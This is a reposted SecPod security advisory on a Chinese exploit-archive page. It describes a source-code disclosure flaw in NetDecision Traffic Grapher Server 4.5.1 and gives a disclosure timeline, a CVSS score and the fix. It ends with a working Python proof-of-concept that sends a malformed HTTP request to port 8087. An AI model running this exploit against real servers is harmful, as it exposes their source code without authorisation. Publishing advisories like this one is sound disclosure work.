首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerabi 来源：www.secpod.com 作者：SecPod 发布时间：2012-03-01   ############################################################################## # # Title    : Netmechanica NetDecision Traffic Grapher Server Information #            Disclosure Vulnerability # Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor   : http://www.netmechanica.com # Advisory : http://secpod.org/blog/?p=481 #            http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc_Vuln.txt #      http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc_PoC.py # Software : Netmechanica NetDecision Traffic Grapher Server version 4.5.1 # Date     : 06/12/2011 # ############################################################################### SecPod ID: 1039         05/12/2011 Issue Discovered       21/02/2012 Vendor Notified       22/02/2012 Vendor Acknowledge       24/02/2012 Issue Resolved Class: Information Disclosure   Severity: High Overview: --------- Netmechanica NetDecision Traffic Grapher Server version 4.5.1 is prone to source code information disclosure vulnerability. Technical Description: ---------------------- The vulnerability is caused due to improper validation of malicious HTTP GET request to Traffic Grapher Server 'default.nd' with invalid HTTP version number followed by multiple 'CRLF', which discloses the source code of 'default.nd' Impact: -------- Successful exploitation could allow an attacker to cause disclosure of sensitive information. Affected Software: ------------------ NetDecision 4.5.1 (full package) Traffic Grapher Server version 4.5.1 Tested on: ----------- NetDecision 4.5.1 (full package) Traffic Grapher Server version 4.5.1 on Windows XP SP3 & Win XP2. Older versions might be affected. References: ----------- http://secpod.org/blog/?p=481 http://www.netmechanica.com/downloads http://www.netmechanica.com/news/?news_id=26 Proof of Concept: ---------------- http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc_PoC.py Vendor URL: ---------------- http://www.netmechanica.com http://www.netmechanica.com/news/?news_id=26 Solution: ---------- Upgrade to NetDecision 4.6.1 Risk Factor: -------------     CVSS Score Report:         ACCESS_VECTOR          = NETWORK         ACCESS_COMPLEXITY      = LOW         AUTHENTICATION         = NOT_REQUIRED         CONFIDENTIALITY_IMPACT = COMPLETE         INTEGRITY_IMPACT       = NONE         AVAILABILITY_IMPACT    = NONE         EXPLOITABILITY         = PROOF_OF_CONCEPT         REMEDIATION_LEVEL      = UNAVAILABLE         REPORT_CONFIDENCE      = CONFIRMED         CVSS Base Score        = 8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)         Risk factor            = High Credits: -------- Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this vulnerability. #!/usr/bin/python ############################################################################## # # Title    : Netmechanica NetDecision Traffic Grapher Server Information #            Disclosure  Vulnerability # Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor   : http://www.netmechanica.com # Advisory : http://secpod.org/blog/?p=481 #            http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc_Vuln.txt #      http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc_PoC.py # Software : Netmechanica NetDecision Traffic Grapher Server version 4.5.1 # Date     : 06/12/2011 # ############################################################################### import socket,sys,time if len(sys.argv) < 2:         print "\t[-] Usage: python SecPod_Exploit_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc.py target_ip"         print "\t[-] Example : python SecPod_Exploit_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc.py 127.0.0.1"         print "\t[-] Exiting..."         sys.exit(0) port   = 8087 target = sys.argv[1] try:     socket.inet_aton(target) except socket.error:     print "Invalid IP address found ..."     sys.exit(1) try:     sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)     sock.connect((target,port))     time.sleep(1) except:     print "socket() failed"     sys.exit(1) exploit = "GET " + "/test.nd" + " HTTP/-1111111"+"\r\n\r\n" print "HTTP GET request for /default.nd with invalid HTTP version triggers"+\        " the vulnerability" data = exploit sock.sendto(data, (target, port)) for i in range(1,10):     sock.sendto("\r\n",(target, port))     time.sleep(1) time.sleep(10) res = sock.recv(10000) sock.close() print "[+] Source Code of Netdecision Traffice Grapher Server : \r\n" print res sys.exit(1)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Netmechanica NetDecision HTTP ·Netmechanica NetDecision Dashb ·IBM Personal Communications I- ·ImgPals Photo Host Version 1.0 ·ASUS Net4Switch ipswcom.dll Ac ·Novell Groupwise Address Book ·Sysax <= 5.53 SSH Username BoF ·Microsoft Internet Explorer 8 ·Sysax Multi Server 5.53 SFTP P ·Socusoft Photo 2 Video v8.05 - ·Mozilla Firefox Firefox 4.0.1 ·VLC Media Player RealText Subt   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved